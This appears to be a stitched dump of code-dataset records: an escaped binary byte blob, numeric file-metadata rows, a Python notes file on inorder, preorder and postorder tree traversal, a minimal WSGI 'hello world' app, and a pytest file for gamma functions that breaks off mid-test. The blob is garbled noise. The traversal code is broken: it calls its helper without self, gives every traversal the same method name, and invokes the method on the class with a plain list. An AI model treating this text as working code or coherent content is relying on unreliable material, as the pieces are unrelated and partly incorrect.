\x10\xa8\xbe\x0c\x80v\t\x12\x18\x0e\xd3"\xdc\xad\x9c\xd0h\x00~\xd6o\xf5\x9c\x80PV7\\8\x1f\xdd\xcb\xbd\xb7\t\xaf\x15b\xb5\x17\xaf\xcf\xcd#H)\x87\xac\xb6\x8d\xf2j"\xd2E\x9d\x86\xc2-\xe5\xe8\xf3\x06W\xff&\x8d\xbd"\x1b\xedO\xc9\xbck\xe4h~\xa0\xe6\xa16Wa\x8c\xe2\xb4_?\x92a\xa1^-\xfa\xda\xb6\x89f\x8b\xa6i\x96\x8c\xf4\xbd\xd7K*\xaa\x92\x16\x95<\x1b\x1c\xd5y\t\xb3\x11M\xbf\x81\xa6\x1e\x98\xc5\xa6\x88\xca\x08\x0c.\xfd\xc1QX\xde\x89?\x01L\xe3\xab#\xc7\xce\xa49\x1d\x00\xb0\x11\xa5\xc3\x84\xf1\xff\t\xa8\xcd\xed}+*\xbb\xdb\xe5\xa7\xbc;\xbc8.\xa7\xcf\x82\xd7o\xc3\xb8\xa5\xc7\xaa\x89\xfb\x0b\xe4\xd0\xfc+Go?E\xfex\x1by\x86\x16*\t\xff]\xef \x04Z\xb1\xc8\x9e\x14\xe3B\x13\xf9)\'d\xf7\xf7sT\x13\xde1\x15<9\x0c\x17&GL\xf8,\x06<W\xb6\x9bd\xb6H\x89\xdf\t/\xb9\xfb\xa2u\x88\xd4\xc7\x9a\x0b\x13_\xdc\x8ex\xe1|\x8a{\xc4h\x93\t1\x1c\x94\xc4\xd0\x839p\xef6\x8d\xb4\x10\x08Ct\\y\x80\xc3M\xd8\xec\xc4v\xdcT\x1b.\xdf\xa8\x83\xeb\xd3:@g\x99\xcc\x178\x17Gc\xbb\xfe\x8f\xc0Xl\xc4*(\x93\xce\xe9\xd8\x94\xcc\xac(\x1b\xb0\xeaU\x13\xdc\x08\x08[~\xef\x8e+\x98k\x9c\xff\n\r\xb7-\x8e\xbf\x85\xf7\xa6\x13=k\x95\xde\xde.]T\x1c\xe1B+(m\t\xd8a\xd6@\xb0\x80\x08*\xc1|\xc2n\x1c\n\xe6\x08\x1ex\xc5\x96\xf3\xf3\xbe\x01\x02\x16\xa2\xd4\x9c0\x95\xfa;\x94\xec\xa96g;\xe7\x1ff\xee\n\xaf\xf2\xff\x9e(^\xe4o\xf3\xd7\x82z\x8e7J>?\xe1#[h\x1a\x8b_\\i\xc9F\xfeBU\xb1@`\x9a\x87\x95^\xba\x94\x86,\xffX1^\x1c\xd2\xd4\x8dm\x86!\xf1\xc7\x95\xdf\xb6\xc8S7]l\xa1\xcd}\xfa\r\xa7\x0f\x8fw\xeb\xc4\xd7\x92\xa8[w\x8e \x04h\xae\xeb\x01%\x17\xe6\x1c\x1b\x82\x84\x9e\xc1\xb0f\x8c\xce\xcb\x88v\xa6/\xb0\xe8/y\x89\xd0\xf9\x92O\x91\xdbV\'E{\xc4\x986\xd8}\x10\xcc\xf41\xa2r\xcd\x01ZQ=\x08-\x8ag>M\xa0\xc9\xf8\xe5\xb6%n?\x172Y\xf8\xe7\xf1u<\xb5\xc4\xf3<\xb2\xf2\x0b\xe5N\x9cgt,\xba\xd3\xcb\x96H\xc0\xf3s\xaey\xea\xe1]\x84\x9b:x|s\xad\xc3\x03\x85"\x8b\xb3iO\x1a\xf4\xadxZ\x88?\x92\x97\xbd\xc6\xf5l\xf89A8\xd0\xf1\x01;b=rt\xd8\x01\x82;-\xef<\x01\xe8\xf9*\xaa\xff\xa7\x02\x8a\x8a\xefxEav\x94\xa4\xa2h\xc4^W\xd9\x18,]\xa7\xed\xc1\xf4C\xe9\xad[\x9bE\x14"\x8eu\x83q\xa6\x1d-\xab61\xf98\xfd\xaa\xd2m\xed\xa3<\xd9\xffM\xcb\xfea5\xdfS\xc5<\xb6\x93M\xea\x12k\x8b\x1f\xe9\xf99\xc98cV\xf0B\x1d\x91?\xbd\x80}[\x04\xca\x03Y;%\xba\xaa:\xa1\xb0\x07K\'\xb3\x9a2\xe4`#\xd01\x86\x05\x85\xb9\xc5\xd6\x14\xe1\xaa\x15]\xc2\xdfu&\x8a\xcf*:\x95K*\xbb\xeb\x9b\xa4M\xb75=\xd2\x04\xd0\x1dM\xb2n\xa5B\xb9\xa4\x9b\xc5/1m\x92\xf8\xfdK\xf7\xa9\x06D(\x13\xfd\xa0\x1d/\xe7\x02k\x1b\xb2"\xf2I\'\xee\xf9\xbf\x93\xb3\x8c\xfe\xbe6\xe3\xd1\x11Y[\xc6\xef\xc4\xdaM>\xe8\x02\xf2\xafd\xfd\xb8sx\xd0 \xedi\xa0\xc5\x0e.\x03v\xb3\xc7\xaa\x945U\xf0>\x90\xafM\xba\x1c{b\xd5\x80\xf1\xdb\xf8l:H\xf6dgf\xd9g\x9c\xc9V\x19b\xd4\x0c\xbfZ\xa9jB\xcc\xab"\xb4\x026\x93Ax%GW\xc61\x9a<\xd0\x83qrk8 f\'Z\xed\xe5\x95\xce\xa3`\xb1\xe7\x1a\xf0\xd5\n8\x87\xea\x88\xcdN>\x0f\x9e5\xbbu\xd4\xa7\xd7\x8d;\xfe\xad\x85\x13v.\x01\xbe~\x13\x94\xdf\xf3\xa9W#\xdfW\xa6\xad\xc43\xf8\x8d&\xc7Z\x0e\xaf7\xb4\\\xf1\xa9\xe81\xcc?\xa5\xdb\xcf\xfc\n\t\xb9\xca\xddA\x06#\xf7t\x900\xde1}o\xc1\xbb\xd0\x1e\xe5J+\xab`\xed\x8d\x1f\x1c]ts&\'\xc8\x9b\x92_\x93e\x1cZ\r\x95\thV\x9f\x8a\x19\xc3\x10=\x00\xd5*-|s\xa4;\r\x81\xbb\x87\x1d\x92\xf58\xd5\xd5\x1a\xb8)\xc9\x02\x91\\A\x12\xacn\xae\x8f\xbe\x9c\xfb~\x96n0JZ8=\x19\x84)\xbb\xbd\x13\xe9\xb6\x13P\xe7c\xa5\x80 \x17\x8f\x07\xb8D\xc7\x8dM\x06\xad\x8f|c\x8e"\x8dZ\'\x06\xb9\xc2\x1a\xaa[`\xd7\xdc\xa7\x16:\xe4\xda\xb1\xbd\xa7\x94C\x1e\xb44\xd1H\\\xa3\xd1\xea\x92\xeat0\xd1\x02\x89\x05\xf2T&\xb92O\xebb\xdf;\x9c\xa0\x84\xe5\x9d;\xd8\xab\xab\xa2\x99\x81\xc7\xdc\xf1e\x8co\\I\xd9\x91\xa5\x07\xfb\xfc\xff\xa1\xa9P\xcf\xa7\xfe\x85S\x98\xff.o\x16\xee\x01\ts\x94T\xd87\xe4_p\x89\x0e%\x00\xf82E\x82\x93\x01\x85\x91-\x04\x10\x0c\x1e\x1c\xf9\xe3tJ\x7f\x045\xac\xdb\x96\xafs\x82\x11~\xe0U\x00\x80\xeb\x0c!"\xa0_\xe32$\x9e\x04\xdb\xf4W\xfb\xa8\xde\x05\xeb\xbb\x85!\x08\xc2\x10x\xc0\x07J\xc9b\xa8\x99\x10r\xfa`\x8a\x8d\x08\xb2\x906+\x88\xba\x03\x83\\\xa6\x9c&\xae6\xeasF\xbd5\xec\xe7\xcc\xe5\xb9h\xf3\xe7\xdb\xec\x1a2/\xd0\xc2J\xb9G\xfc\xc6i\x91}\x1a\xee\x9aT\xfe\x81i\xadP.\x10s\xbf"Y\r\xb4\xb6\xa5Q\xc8\xf0\xa0\xa4\xad\x0f\xaf\x88\xe8\x82`w\x83\r\x910\x9c\x88\x1f\x03\xe98fP\xf7\xf1\xa6\xea\xb7\xbd;I\xe7\xbe\x83a\xfc\xbfU\x1d\xd0\xf2\x1azl\x9b&\x87O\xa8\xec\xce\xa4\xed\xd1R\x84oY,_\x14\x0e\x86\x9a\xc2g\xd1m\xb6c\xc4\xc2\x83\x142\x8b\xc4>4\x06~\xcbl\xa1\xa6z\xfe\xb2\xb8\r\xfevr\x951\xc2\xb8\x1eF\x93\x87\x98\xfb#c\xbd\xfd\x07($Hc\x9ebw\xd6(\xbb\x91\xb5\x82f\xfbX\x8c\x99q\x9e/\xc9\x0b\x89C}\xd3,`D\x9b\x0f\xf6x\x8c\xfc\xd7[u]\x9c\x0e(L\x95<\xc1\xfcX_UJ\xb6\x8d5\x1a\xecjS)\xba&\xff\xe6hg\xf9\xdc6\xecF\xff\xc4R\xbb\xdc|\x17\xc8\x13^<\t!\xe1\xc6\xdb\xd1\t\x96c>\x17r\x0c\\\x9d|\r\x9c\xf2H\xbf\xd2f\x96|?\x11F\x01\xa3\x96:\xf8{\x88<\xff:\xfc\x1f\x95\xc6`g\xff\xa0\r\x89\x1aO\x95g\xb1\x1e\xfeG}\xc7\x0fan\x91\xcc\xb0\x14\xe8\x87\x9a\xbe\xcd\xd1CE\xa7\xf6\x84A\x04\xbd\xd1\xed[iEo\x82\x91D\x19\xbc)\xef+\x06\xfb\x0e|;y\x9c\xe7\xa7\x8c\x02\x85\x15\xea\x1e0\xbc\x147\xe5\x8d\xd5$\x8c\xb6\x94h8c\x80\xb0\xdf\x00v\xedD\xb5\xb7\xb5KH\x8d\xba\xc6\xcf\x7f\x0cKhC\x8c\\\xef\x1e*z\x999\xfd\xad\xa8\x84\x92\xb8\xbc\xce\xb4\xec\xcc\xd9\x9b\xe7v:f\xa3\xdb\r\xdbK\xb5\xdalq1\xa2+S\xec[\xedV\x1a\xb6\x15\x12\x14\x0c\xde?\x03DyLB\xd1\xbd1\xe8T\xae\x9b\x9epe\x02v\xf6V\x7f\r\x01\xc7\x8b,\x82&V\xeaV\xca\xd8\x89\x0eEc\xb3\xbd\xf3\x84\x85\xa1\xb0\xca\x0f\x82\xc9\xc7\x13\xa8[\xf5\xbde?\x88\xd0\xab\xbf\xc1\xd5\xd4\xd4L\xca\x06G\xc8\xaf\xb6\xf5#\xe8\x86\xe1\x05\xfb|]hILy\x03\xed\xfe\xf3\xbe\xe6\xcc \x0b1\xb7K\xcbV\xc6(\xf9?\xa7Xr3.\xedY\xbem\xa9\xc4Rzf\xa6\xa7;J\x0f=\xb9$\xb7~\x89\x10\r\x9b\xae5\xf3\x18\xbe\xe4\xaa\x00U#\x90b\')@\x8c\xad\x85\x17\xbb\xbf\x9f\xe2O\xe7m\xf1x8\xc3\xe2J\xb6\x8e\xeb\x83q\x8f\x1b\xd4\x87\xc1\xdf\x99\x17)e\x88F\x96\xa0\xafX}\xdbt\x04\xca)#\x07:x]\x82\xf0:\xb1\xaf\xa3\xf9@%\xde?XT\x99\x12]\xfdFC\xaf\xc8]V\xaf=\xe9\xac\x11P\xf4\x17E\xfd\xe8k!Z\xa0\xe0\xfaAWkx\x1c\x81/\xbf\xd3\x93\x9e\x05\xbb\xb2\x97\x8d\x90\xe6\xbf\xc7\x9a\x03\xd6\xfas\xe6\xb0im\xc12\x9a\x0c\x99\xda\xb8\xe5\xad5Z\x85\xfc\xefp<\x0f\xdc\x9f\xd3\x8f0\x97S\xd3\xa1\xcd\xe7\x15hxR\xceL\xc5\x84\xe7\\1\x95\xd8\xca~\r\x10\x85\x91n&\x16\xca*G3f\xafZ\xbc\xb9\xf51hy\x1c\xf0\xd4\x85\xc0\xa2\x93s\xdaAw\xd3\xc6 P\xeb\x9c\x13\x1d\xaas\x03\xdd\xf7\x83\xd5\xaa\xc8@*\x83\xf7\xa8\x8e\x0e\xe5<+\x9a\x14\t\x85U\xf2\x83o\x04L\x11\xe1\xca\xdc\x04lT#C\xdb\xb1I\x89\xcd\xd9\n\x0b}\'\x9c\x07D9\xbc\x8cPt\xb8\xc2\xad\x14\x9a\x80\x01Ut\x89\xd6\xae\xfe\x8e+\xb5\x14\xa9d\x0e\xb4\xc0\xd3\xc2\x02\x90nv\xa7\t`\x04\x8b\xed\x1d\xf5\xd1V\xa2\x93\xf4\xccF\xcbL\xf8\x14\x0f\xd2I]\x9dh1?\x8b9\x9a\x93\x93\\.\xb9v\x84\xe4A,\xb4\x06Q\x12+k\x15\x10\xf5\xfap\xf4\x82\xd4\xf9\x9eq\x0bB*\xd2\x11\x05|\xddc\xf67\xf1H,#\xdao\xd2\xcb\x025\xef(R\xf86\xca(j\x90\t\xed\xa7\x94\xa5\xad\xa1B\x17\x10\x82u\xbbY/\xebc\x96\xa3\xd3&\xa0+\xdfC\x8e\x86E\xbb \x1a\xbcI\xfey\xd0\xe0\xe3\x860\xc1\xa9\x05Vk|za\x9dni\x15C\x81\x06F\x9f\xd9%\xd5\x00E\x01\xd8\x0b\x82\xd1\xc4\x1c\'\xe8\xaf\xda66\xf6G\xea\xa5\x0c\xadi\xf1\x80y\xba\x83p\xba\x14\x1d\xa0n$\x02\x01\xd7\xbex\xc7\xf4\xe1\xaf2Jk\x0f\x8dy\x15j\x1du\xe8\xe6U\xa2\xfcq=d\xb0X\xa1\xe4\xf7\x9b\x17\xae\x04\xfa\x8d!2\xe2J\xd6\x92<\xf4\xa0"+0\x86\xea\x1fa\xb9\x86.\xc5\x14^\x8a\x11s%\x12;\xd4\xfb%\xe6\xf2\xa9D\x15\x14~\xcdX9\xf0\xedl\x9d\xff\x86?\r\xd7\xd2y\xbf\x80\x96\xf2\xc2\xd6\xf2\xc3q\x89"\xfc\x17\x040e\x1b\xa9yw\xcfm\xe2+\r\x0b\xb7\xe4\x01\x13o\xf2\x81\x8c\xfahOLF\x93\xa3\x1a\xe1\x8b\xa3P\xca#\x96N%\xe1H?\xa0\xad[\x07\xaf\x00\x86\xa9F_\xcf\x98]\x85\x92\x06\x94\xb9\r\xb1\xb1\x1c\x86\x91A9\xe0N\xed\xbd\xc8\x98\xcdn\xbcy\x144@L\\+\xf7\x1c\x91\xbf\x98C\xdd[n\xd5\xa0y#\xf8b\xc9\xe4\x99 ]r\xef\xad\x17\x0b\x9a\xe4\xa0>Ew?\x90\xf5S\xea>0II\xbc\xda\xc8\x91\xe1\x94g\xbd\x98\x94*G\x8e\'2`\xa6%\x8d\x82\xb3ND\x97\x14\xe6\xc1\xa8;\xa4tW\xdf\xb0\xd8\xd8$\xafom\xeb/e+\xb4\xd3"\x80\x8b`bt\xd2LL6\x98$\xf4\xa6\x8b\xfd\xc5\tWV5\x16\xd3\x11\xde$\xb6;<F\xac\xbcg\xc7\xc2sN\x95\x86\x08l\x91Q\x10\x8ay\n\x12-\x14\x98\xbc\xe4\xa6;\xe1\xe4\xd8\xc1.\xb2\xdee^\\\x0f\t2V2\r\x8f\x96\xe7]g,P\r\x06t\x00KJ\x87\xbe\xf4^\xf38\x08($\xf8\x02\x82ms3\x9b\xe7\x1fh\rqT\x0e\xbbX\xa0\x97\xb5\xd1\xef\x85v\xbc\x0e\x83\xad\x15\x12<\x8d\xcc\x9c*\xe1d\x8d\t\xda\n^W\xae\x95\x8f\xf7>\xaa\xab\xe9\xe4\x17\xa1\xda\xd4\x0f{\xc6S0\xa9A\x82\xa7\x9c\x01\xe4K\xdew\x8c\xc7t\x826\x01\xae_(v%)\x86W\xd8s-\x8b\xdd\xb3\x11\xfe;\xa1\x87\xf9\xc6I2\x9fl\x8d\xc3\x14\xb0\xb7_\x11J\xbd\x06\xe3\xd6qx\xdbFLG\xd6(\r\x80\x07\xdd\x1a\x9c<\xa1\r\n\x0f|\xcf\xcb\xe0\x96o\\\x92\x02\xe7\xb7$\x84>\xda\x7f#\xfa\xc613y\xf3"\x8a\x15\x81\xb0`\xcb\xd3!9;\x0e\x1c\x97\xb9b\x89Ra\xfc\xcdT\x08\x97\x88\xc6\xf1X\xae\x0cbR\xaaZ\x8fa\x0fUu\xe6\xfc\x08\\\x0b\xe2Q\xb1\xb88]\xf4q\x9b\x13\x02\xc0\xca!\xbe\x00\xb0\xa4\\\xb2\xa2\xb5\xa6\xe2\xfam\x8f\x01\x01\xd4"\xd7\xc8\x1d\x16<\xf8u\xdfw\x80q\xc6\xf5\xd7\xb7L\x9f~\xaa\x97\x14u\xb44\xd83\xa9\xc0\x89\xf7\xe8\x82\xfb\xe6<\xedL\xcd\x9bt\x88\xbf\x9f\x07]\x87\x08\x95\xe6\xf7\xa4\x90\xe2\xdf\xa0D\x15\x07U \r\xbe\xf9\xdb\xfec~\x8b+\x10\x0b\xdc\xb79f\xa6H\xca\x93\xb8\x17Y\xae\xc9n\xf7\xa2\x82\xdc\xb1A\xa9Sr\xb0\x90\xe2sZB\x80\x9c\x89\xfb\xed\xb5\x91\x92\x84`\x13\x1av\x7f\x125\x98\x0ee\xb5\xd8h\xea\x04\xec\xcd\xcf"\xbd\xd2\x1fG\x87\x0f\x03\x16}\xdd\xd0\xc2\xd5\x88\x0b\xc3$\x1e\x05\x80\xb8\xa9L\xd5iT\xf3E\xdek\xac\x8e\xe3\xefTy\x8b\x14W\x01\x84\xe7\t8\x08\xa4\xe3\xce\x86\xd4\xbd\xac\'0\xa2P3\xf5/U\x81S\xa2\xe8\r\xccd\x01\x002\xfa\x9aD\xb3\xfa\x11\xa7\x11\xba7\x98\xcb\x10\x15\x9b=\xdb)\xc6\xb6\xf7`\xa3\x9c\xe0\xef9\x14\xfb\x8c]\xd6\xe5s\xd4\xb4\xc46\xc4\xf6)\xe2\xa3\xf9\x193\xe2\xcb\xd6\xa5F\xb9H\tq_\xb9\x98;\xd89\xfc\x18\xf0\xa8t\xe6\xcb\xbcP\xf3\x9e!\xfe\xc3\x96\xe0\x1e\x80\x84[\xb2\x19nvpg\x10\xc1\xa1\xbd\xcc>1\xa4\xe4\xca_\x96\x06(PE\x8c\xf1i\x05:\x13\x958y\xa2X\xc9\x97\x8fy U\xd5FF\x01\xbd\xd0N<\xc2\x15\x02\x93\xd0\xab\x00\r!p\xb3\xf5Z\nQ\x9d\x9f\x7f\x8c\x9f\xed\xdc\xc0\xb1\xd1\xb6t\x96\xdb\xa3\xabe\xa4T\xdc\xd5\xa4\xe21W\x10\xdc\xc7\xffo\x0c\xa2\xb5\x83\x01\x1f\xb0\xdet\x88n7\xd1\xeb\x12t\x06\x88\xa2L\x90\xcc\x8d\\5\xcd\xf3\xe5\x15\xcd\xd4\xe5Y\xde\xf5{\x8f|w\xee3\xa2\xd2\x8b\xf8\xf9\xdb\xd9\xb2\xddX\xd1%\x8c\xcdI\x00n\xc7lQ\x9a?\x86\xa3\xcczH \xb2\xa9\x7f\xa7\x92\xe0t3\x1d4\x02\xa9\x81\x10\xb9\xceON\xf4\xd3UQO\x8dT\xf0\xa0t\xe9w\x8a\xa5\xf8v\x10v|4\xd1Wb(\xf1l\xab\xbf\xea\xee\xbe\xa1\xa0\xc8KP\x07\xb9y_\xbe\xbe\x00\x885\xe0\xb0\xc4\x9cOQP\xec\xfcC\xddo\xa3\xa5\xdc\xddUwE\x98\xb2\x97\x146\x8dC|\xdc\x01\xeb\'\xb9mD\xdb\\\x07{\x17\xab\xb8T _r#|\xeb[99,pC\xaf\xb1\xb4\xd3\xe7Pc\xb1\xd1\x15\xc0K\x8f\xd4\x0f\xb8Qx\xf4\xc7\x98\xeeGU+\x81V\xc8\xc6\xe3\xb3,e\x0b}|\xd2\xf2V(\xb7\x05\xc1f\xf8\xc4uo%\x93\x08\xed\xa6.\xed\xca\xbeA\x1d\xb7\x16.\x0flLPi:_3x\xc4\xb1O\xc5\xc2\x91\xdd\xf3\xf9[K\xb6\xfa\xcaK\x08\xac\x96\x06\xfa\xf7\xf2i&2\xbc\n&\x01\xafa\xf3$\xe4\xbby\xbfs\xc7\x18\\\xd5\xe0c AT\xa8$\xd1\xcd]\x1f\xa6\x97\xfe\xbfm?\x96\xe7\x18d\xeaO\x1d\x03E\xdbH\xb6\x11\xfe\\\xd6\x00\x147\x8bd\xed8\xd7Z\xf7Hx\x088U\x9eo\xdc\xce\xc2\xd1\xd6W\xe2j\x06f\xc0#\x84\xc0H\xb43\xe3\xca8@A\x84\x83\x1d\x9e\xa7b\xa9\x89\xbf\xce\xd1\x8a\xeb%$\xcd\x11\x82\x0f\xbbl\xe4\xbd\xc2\xa3\xce\xbc\xf7\xa1\x1dk\xd6\xecY\xe7c\xbb47\neu\xe2y\xe5\xb4=\xe4\xe3\xc7\xccs\xf1\x10\xdb\x9f\xa5\xf8\xa5\xf9\x8a\xe2z}\x072"m[\xd0"\xc7\x83[G\x86\xe6~\x85\xf1Y\xffpNM96\xea\x8a\xeek\xc4\x15]\xa4\x8d\x9f\xf5h\x83h\xdb\x16`\xa9\xbb6[8\xd3\xe5v\xc5\x92dsL\xb08\xeb\xe8\x92V\x02\xf2\x95{\xc4\xb8\x16E7\xa0\xb6\xf7\xden\xdc\x08\x15 \xcf\x16^\xb0C<\xe2]\x9e\x8f\x10R\n!\xd3\x04\x05\xdf\xfd(kUG\xee\xb3\xfb\x92c\xbc\x02\x9d\xb8\xe5\x1dq\x98\xa7|\x18\n\xf4%\xec\r\xb4T\xbc$\'<\x02\xb6#\xd4^\x1e\x0f\xa2\xe9\xfft+\x00\xdc\xa7\x9a\x1de\xf9\x0bt\xebf\x91\xdd\xe8\xba\x9a\xf6\xd6\x1e\xaa2\xd4\x92\xf60rz\xfc\xa2=b\x12\xb4\x12\x93\nO\xe5n\x11\x1bG"\xf5\x99\xfdw\xce\x19\x85\xc9|'
| 220,525
| 435,946
| 0.734436
| 101,349
| 441,050
| 3.190017
| 0.119311
| 0.000186
| 0.000056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.232752
| 0.001349
| 441,050
| 2
| 435,946
| 220,525
| 0.501273
| 0
| 0
| 0
| 0
| 204
| 0.68697
| 0.685213
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b5e825b7eabce2fa67dac63053e620fbe29da8
| 3,113
|
py
|
Python
|
Notes/Sprint3/BinaryTree_BST.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | 1
|
2021-02-28T07:43:59.000Z
|
2021-02-28T07:43:59.000Z
|
Notes/Sprint3/BinaryTree_BST.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | null | null | null |
Notes/Sprint3/BinaryTree_BST.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | 1
|
2021-03-03T03:52:21.000Z
|
2021-03-03T03:52:21.000Z
|
"""
Binary Tree Inorder Reversal
Given the root of a binary tree, return the inorder traversal of its nodes' values
Examples:
Input: root = [1, null, 2, 3]
Output: [1,3,2]
Plan
- Use recursion to go to the left subtree first
then process the current node,
then use recursion again to the right subtree next
When building a recursive function:
base case, recursive case
"""
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def inorderTraversal(self, root: TreeNode):
res = [] # resulting array, append values to this array
if root != None:
inorderTraversalHelper(root, res)
#traverse
return res # if not None
# helper method --
def inorderTraversalHelper(self, root, res): #recursive function
if root == None: # base case
return
# go to left subtree first
if root.left != None:
self.inorderTraversalHelper(root.left, res)
# process current node
res.append(root.val)
# go to right subtree next
if root.right != None:
self.inorderTraversalHelper(root.right, res)
root = [1,'null',2,3]
Solution.inorderTraversal(root)
"""
Binary Tree Preorder Traversal
"""
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def inorderTraversal(self, root: TreeNode):
res = [] # resulting array, append values to this array
if root != None:
inorderTraversalHelper(root, res)
#traverse
return res # if not None
# helper method --
def inorderTraversalHelper(self, root, res): #recursive function
if root == None: # base case
return
# process current node
res.append(root.val)
# go to left subtree first
if root.left != None:
self.inorderTraversalHelper(root.left, res)
# go to right subtree next
if root.right != None:
self.inorderTraversalHelper(root.right, res)
"""
Binary Tree Postorder Traversal
"""
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def inorderTraversal(self, root: TreeNode):
res = [] # resulting array, append values to this array
if root != None:
inorderTraversalHelper(root, res)
#traverse
return res # if not None
# helper method --
def inorderTraversalHelper(self, root, res): #recursive function
if root == None: # base case
return
# go to left subtree first
if root.left != None:
self.inorderTraversalHelper(root.left, res)
# go to right subtree next
if root.right != None:
self.inorderTraversalHelper(root.right, res)
# process current node
res.append(root.val)
| 26.606838
| 82
| 0.607774
| 370
| 3,113
| 5.081081
| 0.175676
| 0.038298
| 0.041489
| 0.108511
| 0.820745
| 0.809043
| 0.809043
| 0.809043
| 0.790957
| 0.754787
| 0
| 0.005558
| 0.306457
| 3,113
| 117
| 83
| 26.606838
| 0.865215
| 0.178927
| 0
| 0.966102
| 0
| 0
| 0.001931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e5bd23e93b748634d5ebd43a3a5d71737bcf1520
| 657
|
py
|
Python
|
MINI_WEB/mini_web/framework/mini_frame_3.py
|
GalphaXie/LaoX
|
b7e8f9744292dc052c870e4d873052e9bfec19ee
|
[
"MIT"
] | null | null | null |
MINI_WEB/mini_web/framework/mini_frame_3.py
|
GalphaXie/LaoX
|
b7e8f9744292dc052c870e4d873052e9bfec19ee
|
[
"MIT"
] | 12
|
2020-03-24T17:39:25.000Z
|
2022-03-12T00:01:24.000Z
|
MINI_WEB/mini_web/framework/mini_frame_3.py
|
GalphaXie/LaoX
|
b7e8f9744292dc052c870e4d873052e9bfec19ee
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# file: mini_frame.py
# Created by Guang at 19-7-19
# description:
# *-* coding:utf8 *-*
# def application(environ, start_response):
# start_response('200 OK', [('Content-Type', 'text/html')])
# return 'Hello World!'
# def application(environ, start_response):
# start_response('200 OK', [('Content-Type', 'text/html')])
# # return 'Hello World!'
# # 编码问题
# return 'Hello World! 中国...'
def application(environ, start_response):
start_response('200 OK', [('Content-Type', 'text/html'), ("Content-Type", "text/html;charset=utf-8")])
# return 'Hello World!'
# 编码问题
return 'Hello World! 中国...'
| 26.28
| 106
| 0.627093
| 82
| 657
| 4.939024
| 0.426829
| 0.192593
| 0.197531
| 0.187654
| 0.753086
| 0.753086
| 0.753086
| 0.753086
| 0.604938
| 0.604938
| 0
| 0.03154
| 0.179604
| 657
| 25
| 107
| 26.28
| 0.719852
| 0.652968
| 0
| 0
| 0
| 0
| 0.382075
| 0.108491
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
e5c5ac562b467fae04a78b379d29e12fdfd79e30
| 4,111
|
py
|
Python
|
tests/test_special_functions.py
|
James-Montgomery/platea
|
96188d34293d46ddc3f9935fe1349f83f72c13a8
|
[
"MIT"
] | null | null | null |
tests/test_special_functions.py
|
James-Montgomery/platea
|
96188d34293d46ddc3f9935fe1349f83f72c13a8
|
[
"MIT"
] | null | null | null |
tests/test_special_functions.py
|
James-Montgomery/platea
|
96188d34293d46ddc3f9935fe1349f83f72c13a8
|
[
"MIT"
] | null | null | null |
import pytest
import numpy as np
from scipy import special
import numpy.testing as npt
from platea import special_functions as sf
################################################################################
# Gamma Function
def test_gamma():
"""
gamma
"""
alpha1 = [sf.gamma(i) for i in [0.0, 0.53, 1.0, 5.67, 10.0]]
beta = [special.gamma(i) for i in [0.0, 0.53, 1.0, 5.67, 10.0]]
npt.assert_almost_equal(alpha1, beta, decimal=5)
alpha2 = sf.gamma(np.asarray([0.0, 0.53, 1.0, 5.67, 10.0]))
npt.assert_almost_equal(alpha2, beta, decimal=5)
alpha3 = sf.gamma(np.asarray([[0.0, 0.53, 1.0, 5.67, 10.0]]))
npt.assert_almost_equal(alpha3[0, :], beta, decimal=5)
def test_gammaln():
"""
gammaln
"""
alpha1 = [sf.gammaln(i) for i in [0.0, 0.53, 1.0, 5.67, 10.0]]
beta = [special.gammaln(i) for i in [0.0, 0.53, 1.0, 5.67, 10.0]]
npt.assert_almost_equal(alpha1, beta, decimal=5)
alpha2 = sf.gammaln(np.asarray([0.0, 0.53, 1.0, 5.67, 10.0]))
npt.assert_almost_equal(alpha2, beta, decimal=5)
alpha3 = sf.gammaln(np.asarray([[0.0, 0.53, 1.0, 5.67, 10.0]]))
npt.assert_almost_equal(alpha3[0, :], beta, decimal=5)
def test_gammap():
"""
gammap
"""
alpha1 = [sf.gammap(1.0, i) for i in [0, 1, 10, 100]]
beta = [special.gammainc(1.0, i) for i in [0, 1, 10, 100]]
npt.assert_almost_equal(alpha1, beta, decimal=5)
alpha2 = sf.gammap(np.ones(4), np.asarray([0, 1, 10, 100]))
npt.assert_almost_equal(alpha2, beta, decimal=5)
alpha3 = sf.gammap(np.ones(4).reshape(1, -1), np.asarray([[0, 1, 10, 100]]))
npt.assert_almost_equal(alpha3[0, :], beta, decimal=5)
def test_gammaq():
"""
gammaq
"""
alpha1 = [sf.gammaq(1.0, i) for i in [0, 0.1 ,0.5, 1]]
beta = [special.gammaincc(1.0, i) for i in [0, 0.1 ,0.5, 1]]
